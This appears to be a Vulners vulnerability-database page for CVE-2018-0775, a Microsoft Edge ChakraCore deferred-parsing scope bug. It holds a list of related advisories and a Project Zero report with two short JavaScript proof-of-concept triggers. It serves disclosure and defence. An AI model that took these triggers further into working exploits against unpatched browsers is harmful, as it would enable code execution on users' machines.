| Reporter | Title | Published | Views | Family All 38 |
|---|---|---|---|---|
| Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2) | 18 Jan 201800:00 | – | zdt | |
| The vulnerability of the JavaScript script handler ChakraCore in the Microsoft Edge browser allows a hacker to execute arbitrary code. | 21 Feb 201800:00 | – | bdu_fstec | |
| CVE-2018-0775 | 17 Jan 201800:00 | – | circl | |
| Microsoft Edge Scripting Engine Memory Corruption Vulnerability (CNVD-2018-00509) | 5 Jan 201800:00 | – | cnvd | |
| CVE-2018-0775 | 4 Jan 201814:00 | – | cve | |
| CVE-2018-0775 | 4 Jan 201814:00 | – | cvelist | |
| January 3, 2018—KB4056892 (OS Build 16299.192) | 9 Jan 201808:00 | – | mskb | |
| KLA11166 Multiple vunlerabilities in Microsoft Browsers | 3 Jan 201800:00 | – | kaspersky | |
| Scripting Engine Memory Corruption Vulnerability | 3 Jan 201808:00 | – | mscve | |
| CVE-2018-0775 | 4 Jan 201814:29 | – | nvd |
`Microsoft Edge: Chakra: Deferred parsing makes wrong scopes #2
CVE-2018-0775
Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to <a href="/p/project-zero/issues/detail?id=1310" title="Microsoft Edge: Chakra: Deferred parsing makes wrong scopes" class="closed_ref" rel="nofollow"> issue 1310 </a>.
PoC:
// Enable the flag using '\n'.repeat(0x1000)
eval(`(function f() {
with ({}) {
(function () {
print(f);
})();
}
}());` + '\n'.repeat(0x1000));
PoC 2:
// ./ch poc.js -ForceDeferParse
(function f() {
with ({}) {
(function () {
print(f);
})();
}
}());
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation